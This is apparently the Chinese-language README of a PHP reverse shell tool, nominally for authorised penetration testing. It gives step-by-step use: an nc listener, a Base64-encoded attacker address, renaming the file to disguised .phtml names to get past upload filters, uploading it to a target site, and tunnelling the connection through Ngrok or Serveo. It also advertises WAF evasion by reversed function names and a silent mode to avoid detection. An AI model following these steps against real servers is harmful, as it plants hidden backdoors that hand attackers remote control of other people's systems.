这是一个专为道德黑客和渗透测试设计的强大且隐蔽的 PHP 反向Shell。 它能够建立一条可靠且安静的回连通道到您的机器。
此 PHP 反向Shell 严格仅用于教育和授权的渗透测试目的。
开发者对使用此 反向Shell 进行的任何滥用、损害或非法活动概不负责。
请负责任地使用,仅限您拥有或获得明确许可的系统。未经授权的访问是违法的,并将受到法律制裁。
IP 和 Shell 命令经过 Base64 编码,实现隐身
函数名被反转以绕过 WAF 和安全过滤器
静默模式——不显示任何输出以避免检测
连接断开后自动重连
可作为后台守护进程运行(如果服务器支持)
适用于大多数启用 PHP 的服务器
支持 Ngrok、Serveo 等隧道服务
使用 .phtml 扩展名上传以绕过部分过滤器
1. 在您的机器上启动监听器
nc -lvnp 4444
2. 将您的 IP 或主机名编码为 Base64
使用以下简单命令:
echo "your_ip_or_hostname" | base64
示例:
echo "192.168.1.5" | base64
复制输出结果,并替换 PHP 反向Shell 脚本中的 $ip_b64 值。
3. 更新您的 PHP 反向Shell 脚本:
将以下行替换为您的 Base64 编码后的 IP/主机名和端口:
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. 重命名文件并上传
将文件重命名为一个不太可疑的名称,例如:
login.phtml
avatar.phtml
update.phtml
使用 .phtml 扩展名有助于在某些禁止 .php 的服务器上运行文件。
将此文件上传到允许文件上传的目标网站。
5. 触发反向Shell
在浏览器中打开上传的文件:
http://target.com/uploads/login.phtml
打开后,您的监听器将获得一个反向Shell连接。
如果您使用的是移动数据或处于路由器(NAT)后方,您的 IP 可能不是公网 IP。 在这种情况下,反向Shell无法直接到达您的机器。
为了解决这个问题,请使用 TCP 隧道工具,如 Ngrok 或 Serveo。
安装 Ngrok
运行以下命令:
ngrok tcp 4444
它将显示类似:
Forwarding tcp://4.tcp.ngrok.io:18900
更新您的 PHP 反向Shell 脚本:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
启动您的监听器:
nc -lvnp 4444
运行以下命令:
ssh -R 0:localhost:4444 serveo.net
它会显示类似:
Forwarding TCP connections from serveo.net:46603
更新您的 PHP 反向Shell 脚本:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
启动您的监听器:
nc -lvnp 4444
本项目采用 GNU 通用公共许可证 v3.0 授权。